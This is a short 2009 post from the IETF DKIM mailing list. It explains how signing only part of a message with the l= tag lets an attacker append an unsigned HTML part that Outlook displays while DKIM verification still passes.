On Wed, 20 May 2009, Steve Atkins wrote: > Another use case is to use l= to sign a text part of an email, but not > to sign an attachment. In that case I can obviously replace the > attachment with my own content, but depending on the details of the > email structure I may well be able to replace the text section as > rendered to the user as well.
Indeed, Outlook will opt to render an HTML part over a text part whenever given the choice. Thus, if you sign only the text/plain portion of a message and an attacker appends a text/html part, the unsigned HTML version will be rendered even if completely different from the text/plain part, and DKIM would give that a thumbs-up. _______________________________________________ NOTE WELL: This list operates according to http://mipassoc.org/dkim/ietf-list-rules.html
